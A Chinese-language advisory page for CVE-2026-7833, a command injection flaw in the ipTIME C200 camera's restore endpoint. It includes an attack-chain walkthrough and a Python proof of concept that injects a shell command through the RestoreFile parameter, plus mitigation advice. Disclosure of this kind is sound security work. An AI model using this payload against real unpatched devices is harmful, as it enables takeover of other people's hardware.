CVE-2026-7833 CVSS 7.2 高危

CVE-2026-7833 EFM ipTIME C200 命令注入漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7833

漏洞类型

命令注入

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

EFM ipTIME C200

漏洞概述

EFM ipTIME C200 固件版本 1.092 及以下存在安全漏洞。该漏洞源于文件 /cgi/iux_set.cgi 中的 ApplyRestore Endpoint 组件未正确过滤输入，导致 sub_408F90 函数存在命令注入问题。攻击者可远程构造恶意请求，通过操纵 RestoreFile 参数在目标系统上执行任意系统命令。目前利用代码已公开，且厂商尚未发布修复补丁，建议用户尽快采取防护措施。

技术细节

该漏洞位于 EFM ipTIME C200 设备的 Web 管理接口中，具体涉及 /cgi/iux_set.cgi 文件里的 sub_408F90 函数。该函数负责处理配置恢复请求，由于程序在处理 RestoreFile 参数时缺乏严格的校验机制，未能对特殊字符进行有效过滤，导致攻击者可以将恶意的操作系统命令注入到参数中。尽管 CVSS 指出需要高权限（PR:H），但一旦攻击者获得管理员访问权限或绕过认证，即可通过发送特制的 HTTP 请求触发漏洞。攻击者利用 Shell 元字符（如 ; | &）拼接命令，使服务器端执行任意指令，从而完全控制设备，造成数据泄露或系统瘫痪。

攻击链分析

STEP 1

侦察与发现

攻击者扫描网络，识别出运行 EFM ipTIME C200 固件版本 <= 1.092 的目标设备。

STEP 2

获取认证

由于漏洞利用需要高权限（PR:H），攻击者通过暴力破解、钓鱼或利用其他未授权访问漏洞获取设备的管理员凭证。

STEP 3

构造恶意载荷

攻击者构造针对 /cgi/iux_set.cgi 接口的 HTTP 请求，在 RestoreFile 参数中注入包含 Shell 元字符的恶意命令。

STEP 4

发送攻击请求

攻击者向目标设备发送特制的 HTTP POST 请求，触发 sub_408F90 函数处理恶意参数。

STEP 5

执行命令与控制

设备后端将参数直接传递给系统 Shell 执行，攻击者成功在设备上运行任意命令，获得系统控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable device
target_ip = "192.168.0.1"
url = f"http://{target_ip}/cgi/iux_set.cgi"

# Malicious payload to inject command (e.g., creating a file)
# Note: PR:H implies authentication might be required.
# Assuming the attacker has a valid session cookie.
payload = "; touch /tmp/vulnerable_poc"

data = {
    "RestoreFile": payload
}

headers = {
    "Cookie": "session_id=valid_admin_session"  # Placeholder for authenticated session
}

try:
    response = requests.post(url, data=data, headers=headers, timeout=5)
    if response.status_code == 200:
        print("[+] Request sent successfully. Check if command executed.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] Error: {e}")

影响范围

EFM ipTIME C200 <= 1.092

防御指南

临时缓解措施

由于厂商尚未响应，建议用户立即将设备管理端口隔离在内部网络中，避免暴露在公网。同时，通过防火墙策略严格限制访问源 IP，并密切关注设备异常行为。若条件允许，可暂时停用该设备的管理功能或更换设备。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7833
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7833
3 Details https://www.cvedetails.com/cve/CVE-2026-7833/
4 VulDB https://vuldb.com/cve/CVE-2026-7833
5 Link https://github.com/glkfc/IoT-Vulnerability/blob/main/iptime/c200/sub_409054_vulnerability_report_EN.md
6 Link https://vuldb.com/submit/807786
7 Link https://vuldb.com/vuln/361112
8 Link https://vuldb.com/vuln/361112/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表